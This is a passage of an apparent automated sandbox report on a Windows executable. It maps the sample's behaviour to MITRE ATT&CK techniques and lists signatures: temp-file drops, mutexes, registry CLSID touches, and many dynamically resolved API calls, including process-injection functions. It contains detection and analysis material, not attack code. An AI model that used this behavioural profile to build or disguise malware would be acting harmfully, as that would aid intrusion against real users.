"https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\xagapalr.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00002276)\n 